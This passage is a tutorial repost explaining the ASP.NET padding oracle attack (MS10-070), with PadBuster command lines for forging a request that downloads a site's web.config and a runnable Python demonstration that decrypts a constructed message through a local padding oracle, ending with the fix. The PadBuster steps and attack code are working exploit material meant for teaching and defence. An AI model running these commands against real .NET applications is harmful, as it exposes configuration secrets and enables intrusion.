    4. If response 2 and response 3 differ, the application is exploitable: the distinguishable error is the oracle. A server patched with MS10-070 returns the same response in both cases.

My OWASP presentation on 20-Aug-2011:

The padbuster tool can be used to automate the padding oracle attack. It is free and can be downloaded from https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl

* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi

Padbuster usage to attack .NET applications

  1. Encrypt the web.config request path (this produces the ciphertext used in step 2):
    padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config"
  2. Brute force the first block:
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce -log
  3. Watch the log; at some point you will get a 200 OK. Grab that URL and paste it into the browser: it displays the web.config content.

Watch this video to get a better understanding of the attack:




[Source] http://securitylearn.wordpress.com/2011/08/19/padding-oracle-attack-explained/
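As an added example, not code from the article or from PadBuster, the attack run end to end, so the one-bit leak that steps 1 to 4 test for can be seen turning into plaintext. A four-round Feistel network built on SHA-256 stands in for the block cipher (an assumption made so the block runs with the Python standard library; the attack does not depend on which cipher is under CBC), the key, IV and message are constructed, and the message contains the same `|||~/web.config` string the PadBuster commands encrypt. The attacker code (`attack_block`, `padding_oracle_decrypt`) never touches the key; it only calls `padding_ok`.

```python
import hashlib

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in block cipher: a 4-round Feistel network with SHA-256 as the round
# function (assumed so the example needs only the standard library).
def _f(key, half, i):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:BLOCK // 2]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r


def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


class PaddingOracle:
    """Server side: knows the key, leaks only whether the padding was valid."""
    def __init__(self, key):
        self._key = key
        self.queries = 0
    def padding_ok(self, iv, ct):
        self.queries += 1
        try:
            unpad(cbc_decrypt(self._key, iv, ct))
            return True
        except ValueError:
            return False


def attack_block(oracle, prev_block, target):
    """Recover one plaintext block: learn D(target) byte by byte by forging the preceding block."""
    inter = bytearray(BLOCK)  # D(target), filled from the right
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        forged = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):  # known bytes: force them to decrypt to pad_val
            forged[k] = inter[k] ^ pad_val
        for guess in range(256):
            forged[pos] = guess
            if not oracle.padding_ok(bytes(forged), target):
                continue
            if pos == BLOCK - 1:  # last byte: confirm it is \x01 and not e.g. \x02\x02
                forged[pos - 1] ^= 1
                still_ok = oracle.padding_ok(bytes(forged), target)
                forged[pos - 1] ^= 1
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle accepted no guess")
    return _xor(bytes(inter), prev_block)  # P = D(C) xor C_prev


def padding_oracle_decrypt(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b"".join(attack_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return unpad(plain)


# Constructed key, IV and message; the path is the one the PadBuster commands encrypt.
EXAMPLE_KEY = hashlib.sha256(b"example key, not a real secret").digest()
EXAMPLE_IV = b"constructed-iv16"
EXAMPLE_PLAINTEXT = b"ticket=4711|||~/web.config"


def demo():
    """Encrypt with the key, then recover the plaintext using the oracle alone."""
    ct = cbc_encrypt(EXAMPLE_KEY, EXAMPLE_IV, pad(EXAMPLE_PLAINTEXT))
    oracle = PaddingOracle(EXAMPLE_KEY)
    return padding_oracle_decrypt(oracle, EXAMPLE_IV, ct), oracle.queries
```

`demo()` recovers the two-block message in at most 256 queries per byte, which is the cost PadBuster pays per block as well; the `-plaintext` mode in step 1 is the same loop run in reverse, choosing each forged block so that the next block decrypts to the bytes the attacker wants. The fix is to authenticate the ciphertext (a MAC checked before decryption) and to return one uniform error whatever went wrong.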




Posted by bitfox